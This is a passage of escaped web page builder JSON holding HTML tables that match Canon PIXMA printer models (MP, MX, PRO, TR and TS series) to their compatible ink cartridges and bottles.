(Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo 